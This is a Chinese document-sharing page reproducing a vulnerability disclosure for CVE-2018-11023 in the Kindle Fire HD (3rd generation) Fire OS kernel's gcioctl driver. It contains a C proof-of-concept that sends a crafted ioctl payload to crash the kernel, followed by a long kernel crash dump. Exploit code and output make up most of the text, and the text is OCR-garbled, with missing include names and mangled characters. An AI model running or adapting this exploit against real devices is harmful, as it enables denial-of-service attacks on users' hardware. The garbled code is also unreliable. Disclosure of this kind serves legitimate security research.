《(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(7页珍藏版)》请在第壹文秘上搜索。
1、(CVE-2018-11023) Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) FireOS 4.5.5.3 的内核组件中的内核模块 omapdriversmiscgcxgcioctlgcif.c 允许攻击者通过设备/ dev 上 ioctl 的参数 注入特制参数/gcioctl使用命令3222560159,并导致内核崩溃。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc/* This is poc of Kindle Fire HD 3rd* A bug in t
2、he ioctl interface of device file devgcioctl causes the system crash via IOCTL 3222560159.* This Poc should run with permission to do ioctl on devgcioctl.*/#include #include #include #include const static char *driver = ,devgcioctl;static command = 3222560159;int main(int argcj char *argv, char *env
3、) unsigned int payload = 0x244085aa, 0la03e6ef 0x000003f4, 0x00000000 ;int fd = 0;fd = OPen(driver, O_RDONLY);if (fd datalocaltmplog);return -1;printf(Try open %s with command 0x%x.n”, driver, command); printf(System will crash and reboot.n);if(ioctl(fd command, Spayload) datalocaltmplog);return -1;
4、close(fd);return 0;崩溃日志79.825592 init: untracked pid 3232 exited79.830841 init: untracked pid 3234 exited95.970855 Alignment trap: not handling instruction el953f9f at f395.978912 Unhandled fault: alignment exception (0001) at 0xla03e695.986053 Internal error: : 1 #1 PREEMPT SMP ARM95.991638 Modules
5、 linked in: omaplfb(0) pvrsrvkm(O) pvr_logger(0)1)95.999145 CPU: 0 Tainted: GO (3.4.83-gd2afc0bae69 #96.006408 PC is at _raw_spin_lock_irqsave+0x38/0xb096.012115 LR is at _raw_spin_lock_irqsave+0xl0/0xl496.017791 pc : lr: psr: 2000009396.017822 sp : d02bfdd8 ip : d02bfdf8 fp : d02bfdf496.030578 rl0:
6、 00000000 r9 : dd3eeca8 r8 : 000000010096.036376 r7 : Ia03e6ef r6 : 00000001 r5 : Ia03e6f3 r4 : d02be0 1396.043701 r3 : 00000001 r2 : 00000001 rl : 00000082 r0 : 20000096.050933 Flags: nzCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment user96.058990 Control: 10c5387d Table: 96cb804a DAC: 0000001596.0
7、6546096.065460 PC: 0xc06a4d08:96.070404 4d08 la000003 eaffffe6 e5903000 e3530000 0affffe3 e5903004e3530000996.080810 4d28 eaffffdf e50b0018 ebfffbab e51b0018 eaffffed ela0c00de92dd800 e24cb00496.091217 4d48 ebffffcf e89da800 ela0c00d e92dd878 e24cb004 ela0300de3c34d7f e3c4403f96.101776 4d68 ela05000
8、 e3a06001 e5943004 e2833001 e5843004 el0f0000fl0c0080 el953f9f96.112335 4d88 e3330000 01853f96 e3530000 0a000014 el21f000 e5943004e2433001 e584300496.122894 4da8 e5943000 e3130002 la000010 e5953004 e3530000 e595300005856004 e353000096.133361 4dc8 la000003 eaffffe7 e5953000 e3530000 0affffe4 e5953004
9、e3530000 Iafffff996.143920 4de8 eaffffe0 f57ff05f e5853004 e89da878 ebfffb79 eaffffeeela0c00d e92dd80096.15447996.154479 LR: 0xc06a4d90:96.159393 4d90 e3530000 0a000014 el21f000 e5943004 e2433001 e5843004 e5943000 e313000296.170013 4db0 la000010 e5953004 e3530000 e5953000 05856004 e3530000 la000003
10、eaffffe796.180603 4dd0 e5953000 e3530000 0affffe4 e5953004 e3530000 Iafffff9 eaffffe0 f57ff05f96.191070 4df0 e5853004 e89da878 ebfffb79 eaffffec ela0c00d e92dd800 e24cb004 ebffffcf96.201690 4el0 e89da800 ela0c00d e92dd800 e24cb004 ebfffff6 e89da800 ela0c00d e92dd80096.212341 4e30 e24cb004 ebfffffl e
11、89da800 ela0c00d e92dd818 e24cb004 ebffffc0 ela0400096.222808 4e50 ebe6a978 el21f004 e89da818 ela0c00d e92dd800 e24cb004 ebfffff3 e89da80096.233612 4e70 ela0c00d e92dd830 e24cb004 e24dd008 ela0300d e3c34d7f e3c4403f e3a0500196.24426296.244262 SP: 0xd02bfd58:96.249145 fd58 00000000 0000001d 00000004
12、d4736f80 d4737394 C06a4d84 20000093 ffffffff96.259948 fd78 d02bfdc4 00000001 d02bfdf4 d02bfd90 C06a5318 C0008370 20000013 0000008296.270660 fd98 00000001 00000001 d02be000 Ia03e6f3 00000001 la03e6ef 00000001 dd3eeca896.281311 fdb8 00000000 d02bfdf4 d02bfdf8 d02bfdd8 C06a4el0 C06a4d88 20000093 ffffff
13、ff96.292053 fdd8 0000020a 00000082 Ia03e6f3 d02be000 d02bfe04 d02bfdf8 C06a4el0 C06a4d5c96.302825 fdf8 d02bfel4 d02bfe08 C06a4e24 C06a4e0c d02bfe5c d02bfel8 C06a3008 C06a4e2096.313415 fel8 d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54 Ia03e6ef96.323883 fe38 bed24608 d02b000 d627f000
14、 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe6096.33453396.334533 IP: 0d02bfd78:96.339416 fd78 d02bfdc4 00000001 d02bfdf4 d02bfd90 C06a5318 C0008370 20000013 0000008296.349853 fd98 00000001 00000001 d02be000 Ia03e6f3 00000001 la03e6ef 00000001 dd3eeca896.360290 fdb8 00000000 d02bfdf4 d02bfdf8 d02bfdd8 C06a4el0 C06a4d88 20000093 ffffffff96.370727 fdd8 0000020a 00000082